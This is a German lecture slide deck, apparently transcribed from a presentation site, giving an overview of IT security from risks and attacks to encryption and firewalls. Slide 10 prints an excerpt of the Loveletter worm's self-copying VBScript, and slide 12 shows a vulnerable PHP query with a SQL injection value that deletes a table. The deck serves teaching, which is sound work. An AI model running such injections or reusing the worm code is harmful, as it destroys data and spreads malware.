Die Präsentation wird geladen. Bitte warten

Die Präsentation wird geladen. Bitte warten

IT Sicherheit Ein Überblick.

Ähnliche Präsentationen


Präsentation zum Thema: "IT Sicherheit Ein Überblick."—  Präsentation transkript:

1 IT Sicherheit Ein Überblick

2

3

4

5

6 Potentielle Risiken (Auswahl) Beispiele für Lösungen
Inhalt Überblick Potentielle Risiken (Auswahl) Beispiele für Lösungen Authentisierung Wer greift auf Daten/Systeme zu ? Verschlüsselung Daten vertraulich halten Firewall Netze gegen Angreifer schützen Was tun ?

7 Datensicherheit: DIN 44300, Teil 1.
Schutz von Daten gegen Beeinträchtigung (Verlust, Zerstörung, Änderung) und vor Mißbrauch Datenschutz: Schutz von Personen vor Beeinträchtigungen durch Verarbeitung von Daten Betrug (Nicht-) Verfügbarkeit Sabotage Spionage

8 Sicherheitskriterien
Beispiele für Risiken Integrität Konsistenz Korrektheit Sabotage Viren Schaden weltweit 2003: 50 Milliarden $ ??? Spionage Vertraulichkeit Zugriff nur durch berechtigte Personen Hacker Betrug Verbindlichkeit Authentisierung von Nutzern Persistenz fake orders spoofing Nicht- Verfügbarkeit Verfügbarkeit Zugriff jederzeit möglich DoS, DDoS, mail flooding

9 Loveletter: Liebe macht blind ....
@ MS Outlook MS Outlook @

10 Loveletter Quelltext (Auszug)
rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") ....

11 Aktuelle Viren Intervall zwischen Entdeckungn und Schutz durch Anti-Viren Software !

12 SQL-Injection. Maier File index.htm Maier; delete from address
... <form method="post" action="db-request.php"> <input type="text" name="sstring"> <input type="submit" name="search" value="search"> </form> File index.htm Maier; delete from address ... $selstring = "SELECT * FROM Address WHERE name=$sstring'"; $conn = pg_Connect("localhost", "5432","","","somedb"); $result = pg_Exec($conn, $selstring); File db-request.php

13 Distributed Denial-of-Service Attack (DDoS).
Probleme: Unterschied zwischen echten und falschen Anfragen Verteilte Netzwerk-Infrastruktur victim slave installing a demon Angriff Intrusion Detection Systems master Hack Angreifer

14 Wardriving, LAN jacking

15 Gegenmaßnahmen Virenscanner Pasßwort Biometrie Backup
Verfügbarkeit Verbindlichkeit Vertraulichkeit Integrität Managed Security Services Virenscanner Pasßwort Biometrie Backup Zugangs- kontrolle Firewall Verschlüssel- ung, VPN Digitale Signaturen intrusion detection

16 Nötige Vorkenntnisse der Hacker
Script Kiddies web worms Nötige Vorkenntnisse der Hacker complexity of hacker tools intrusion into not secured system source: c't 2/2002, S. 79 cracking of passwords viruses guessing of passwords

17 Beispiel: Unberechtigten Zugriff verhindern
user identification Passwort, Biometrie, Authentisierungsverfahren Nutzerrechte Wer darf auf welche Resourcen zugreifen Zugriffskontrolle firewall, Intrusion Detection Systeme Verschlüsselung Zugriff auf Daten bleibt zwar möglich, diese sind aber nutzlos

18 Password cracking. Brute force hack Dictionary hack Spionage
Ausprobieren aller Buchstabenkombinationen Dictionary hack Systematisches Ausprobieren von häufiger verwendeten Wörtern (aus Worllisten) Hybride Verfahren: Kombination von Wörterbuch und Ausprobieren von Buchstanben/Zahlen Spionage Blick über die Schulter Trojanische Pferde, key logger Social Engineering Ausnutzen der Naivität von Anwendern Z.B. fake mail an Angestellte mit sender spoofing ("IT security dept.") zur Abfrage von Kennwörtern Studie von BBC News zeigte, daß 92% der Teilnehmer bereit waren, persönliche Angaben wie etwa Geburtsname der Mutter, Grundschule,... Zu verraten (Comm. ACM Vol. 48/6 p. 10)

19 Default Kennwörter

20 Ziemlich einfach ...

21 Social Engineering. Original und Fälschung

22 Beispiel Telekom Phishing mail

23 Biometrie

24 eTokens.

25 Verschlüsselung Problem Datenübertragung über öffentliche Netze ist öffentlich ! (insbesondere bei Funknetzen) Lösung Private Netze (teuer) oder Verschlüsselung: Der Absender wendet (mathematische) Funktion auf die Daten an, die nur (!) vom Empfänger rückgängig gemacht werden kann Absender: E = e(K1,M) : K = key, M = message Empfänger: M = d(K2,E) : E = encrypted message, Funktioniert, wenn M = d(K2,e(K1,M)) symmetrisch, wenn K1=K2, sonst asymmetrisch

26 Substitutionsschlüssel
Einfache Verschlüsselungstechnik: Jedes Zeichen wird durch ein anderes ersetzt Das Transformationsschema ist der Schlüssel: Originalalphabet: abcdefghijklmnopqrstuvwxyz Schlüssel: qfwgxbdkpjhyzstiarnouvcelm Verschlüsselter Text: q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn btr qyy wkqrqwoxrn ot irxvxso npziyx brxauxswl fqnxg qsqylnpn q npziyx nufnopouopts pn sto nubbpwpxso qslftgl cpok q fpo tb opzx tr q wtziuoxr wqs frxqh nuwk wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy okx spsxoxxsok wxsourl qsg cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx nufnopouopts iqooxrs cpok xqwk wkqrqwoxr

27 Relative Häufigkeit der einzelnen Buchstaben
Kryptoanalyse Relative Häufigkeit der einzelnen Buchstaben Im verschlüsselten Text In (englischem) Text a 0.006 b 0.020 c 0.011 d 0.003 e 0.000 f 0.026 g 0.023 h 0.003 i 0.020 j 0.000 k 0.040 l 0.020 m 0.000 n 0.062 o 0.085 p 0.060 q 0.071 r 0.051 s 0.051 t 0.040 u 0.037 v 0.003 w 0.048 x 0.114 y 0.028 z 0.011 a 0.096 b 0.015 c 0.038 d 0.039 e 0.114 f 0.020 g 0.013 h 0.035 i 0.071 j 0.002 k 0.003 l 0.047 m 0.030 n 0.065 o 0.082 p 0.034 q 0.001 r 0.061 s 0.067 t 0.095 u 0.028 v 0.008 w 0.016 x 0.005 y 0.012 z 0.002

28 Entschlüsselter Text a chiffre has to ensure equal probabilities for all characters to prevent simple frequency based analysis a simple substitution is not sufficient anybody with a bit of time or a computer can break such codes easily these codes were used until the nineteenth century and were replaced by codes that change the substitution pattern with each character Gedankenexperiment: Eine Nachricht ist genau ein Zeichen lang Ist hier Kryptoanalyse möglich ? Nein ! Wenn der Schlüssel (mindestens) die gleiche Länge hat, wie die Nachricht, kann sie nicht entschlüsselt werden ! „One time pad“

29 Vernam-Chiffre Eine lange, zufällige Folge von Zeichen wird als Schlüssel verwendet, Verschlüsselung beispielsweise durch Addition mit dem Klartext (modulo 26). Erzeugung von K durch (Pseudo-) Zufallsgenerator Schlüssel: AXVBF Text: HALLO Darstellung als Zahlen, z.B. A=1, B=2 usw. Schlüssel: Text M1 : E1: (IYHNU) Problem: Wird mehrfach der gleiche Schlüssel verwendet, ist Kryptoanalyse möglich: M2 = WELT, K= HALLO, E2 = Aber D= E1-E2 = M1-M2 = , wenn M1 bekannt  M2 = M1-D = (8+15) (1-22) (12-0) (12+8) = = WELT „known plaintext attack“, siehe WEP

30 Enigma

31 Moderne Verschlüsselungsverfahren
Kombination von Substitution und Transposition DES (alt), AES (neu) symmetrisch: Schlüssel für Sender und Empfänger gleich Problem: Wie übermittelt man den Schlüssel ? An viele Partner Lange Schlüssel (one time pad) Ungelöst ! asymmetrisch: unterschiedliche Schlüssel zum Ver- und Entschlüsseln Public/Private key Diskrete Mathematik: Faktorisierung großer Zahlen ist (extrem) rechenaufwändig Signatur: one way functions

32 Typen von Verschlüsselungsverfahren
Stromschlüssel verschlüsseln eine Folge von einzelnen Zeichen Schlüssel üblicherweise durch Zufallsgenerator Blockschlüssel verschlüsseln Blöcke fester Länger (typ. 64 Bit)

33 56 Bit (64 Bit) Schlüssellänge
DES Anforderungen 1973 wurde vom NIST die Entwicklung eines Verschlüsselungsverfahrens ausgeschrieben, Anforderungen: Hohe Sicherheit Effizient implementierbar flexibel Sicherheit soll nur vom Schlüssel abhängen, nicht von einem geheimen Algorithmus Vorschlag von IBM wurde (von NSA überprüft und überarbeitet) akzeptiert und standardisiert Blockchiffre 56 Bit (64 Bit) Schlüssellänge

34 DES Funktionsweise [http://www.itl.nist.gov/fipspubs/fip46-2.htm]

35 Aktueller Stand DES mit 56 Bit Schlüssellänge ist heute durch brute force knackbar 1998 „deep crack“ ca. 24 Stunden, ca $ 2006 COPACABANA, ca. 1 Woche, ca $ NSA kann vermutlich DES in 3-15 Minuten knacken, ca $ [Schneier, Applied Cryptography] Triple DES Dreimal hintereinander DES, langsam ! Verschiedene Verfahren mit zwei oder drei verschiedenen Schlüsseln Effektive Schlüssellänge 112 Bit Z.B. Geldautomaten AES als Ersatz seit 2000 Variable Block- und Schlüssellänge (bis 256 Bit) Z.B. WPA2, SSH, IPSEC, Windows EFS

36 unbeabsichtigte Änderungen Prüsummen
Integrität unbeabsichtigte Änderungen Übertragungsfehler, Hardware,... Prüsummen beabsichtigte Änderungen Prüfsummen sind leicht zu fälschen krypthografische Verfahren

37 Beispiel: MD5 erzeugt aus einer beliebig langen Nachricht einen 128 Bit langen Wert Beispiel: Der Text Heute ist schönes Wetter ergibt den Hash a353cee72e e2f89fb a Empfänger berechnet ebenfalls den MD5 Hash der Nachricht und vergleicht mit dem übermittelten, Üereinstimmung --> Nachricht korrekt übermittelt Problem: Dritte Partei fängt die Nachricht ab und ersetzt sie durch eine andere (mit neuem, passenden hash) Löung: Der Absender verschlüsselt den hash-Wert mit seinem private key. Der Empfänger überprüft nach Entschlüsselung mit dem public key des Absenders.(Digitale Signatur)

38 Internet Firewall LAN Firewalls
Eine Firewall ist ein zentraler Kontrollpunkt zwischen dem Internet und dem LAN LAN

39 Router Internet Router leitet IP-Pakete weiter, vom LAN ins Internet, vom Internet ins LAN Screening Router (Paketfilter) leitet nur Pakete weiter, die def. Regeln entsprechen (IP-Adressen, Ports usw.)

40 Personal firewall Computer Internet Personal Firewall Browser Eine personal firewall ist ein „eingebauter“ Paketfilter, der anwendungsbezogen filtert Die Sicherheit ist fragwürdig Oft kombiniert mit Viren-Scanner Mail client Application

41 Was wird gemacht ? 86 antivirus software 79 81 network firewalls 82 58
automatic backup 52 55 Virtual Private Networks (VPN) 71 29 personal firewalls 34 29 application irewalls 30 26 content filtering 37 Germany 26 USA Dial-Back- or secure modems 17 24 intrusion detection systems 43 source: IT-Security 2003; Juni-Juli, 2500 Interviews with CIOs; in Percent

42 Best practices. Einsatz einer application layer firewall. Automatische Updates der Virenschutz-Software auf Firewall, Servern und Clients Aktuelle Updates einspielen: Hackers nutzen oft bekannte Sicherheitslücken aus, um in Systeme einzubrechen Abschalten aller nicht benötigten Dienste Löschen aller nicht benötigten Programme Netzwerke nach backdoors, Trojanern und anderen Sicherheitslücken scannen, Intrusion Detection Systeme verwenden

43 Probleme bei „sicheren“ Systemen
Die meisten (einfachen) Angriffe sind leicht abzublocken Wie hält man qualifizierte/motivierte Hacker auf ? Tradeoff: Sicherheit Usability Kosten Problem: Schlechte Usability kann Sicherheit verschlechtern: Restriktive Password policy --> schwer zu merken --> Nutzer schreiben Passwörter auf oder verwenden Standardpaßwort

44 „Clevere“ Lösungen..... Persönliche Fragen statt Kennwörtern
„personal entropy“ „Name Ihres Haustiers ?“ Der Name von Paris Hiltons Hund ist Tinkerbell (Bunte o.ä.) Ihr T-Mobile Account wurde gehackt Nach mehrfacher Eingabe eines falschen Kennworts wird der login für bestimmte Zeit gesperrt Sie bieten auf einen Artikel bei ebay und wissen den Namen eines Mitbieters, versuchen sich mit seinem Namen und einem beliebigen Kennwort anzumelden --> sein Account wird geblockt --> Denial of Service attack Was wäre, wenn Geldautomaten den Fingerabdruck prüfen würden ? Vielleicht weniger Betrug ? Vielleicht mehr Raubüberfälle? (siehe Wegfahrsperre)

45 Auch die fortschrittlichste Technologie ....

46 Läßt sich umgehen, wenn man wirklich will ....

47 Man kann Angreifern nur das Leben schwerer machen

48 Es gibt keine absolute Sicherheit
Wenn jemand behauptet, ein unknackbares System zu haben, ist er entweder naiv, oder er lügt ! Das schwächste Glied zählt SQL-Slammer took out 20% of ATM machines in US (costed banks tens of millions of dollars), Continental coudn’t fly for 12 hours, why ? Not the servers were vulnerable, but the network connections were overloaded. Designschwächen (Protokolle, Programmiersprachen,...) Wurden nicht für die heutigen Anwendungen konzipiert Lösungen wären bekannt, sind aber aufwendig: Direkter Zugriff auf den Stack bei vielen Programmiersprachen Buffer overflows könnten verhindert werden, ist aber mehr Arbeit SQL-injection könnte verhindert werden, ebenfalls mehr Arbeit Programmierfehler (bugs) ermöglichen exploits, Patches kommen immer zu spät („zero day exploits“) Fehlerfreie Software zu erstellen ist extrem schwer (unmöglich ?) Bessere Prozeße bei der SW-Entwicklung helfen, aber ...

49

50 Was ist „sicher genug“ Wieviel Sicherheit wird gebraucht ?
Analyse der Risiken, Schäden usw. nötig Online Wettervorhersage vs. Online-banking Wieviel Sicherheit ist gewollt ? Usability Kosten Umgang mit Risiken technisch Organisatorisch (Schulungen,...) Keine Standardlösungen Security ist eine boomende Branche Communications of the ACM Vol 48/6 pp. 82

51 Fragen ?


Herunterladen ppt "IT Sicherheit Ein Überblick."

Ähnliche Präsentationen


Google-Anzeigen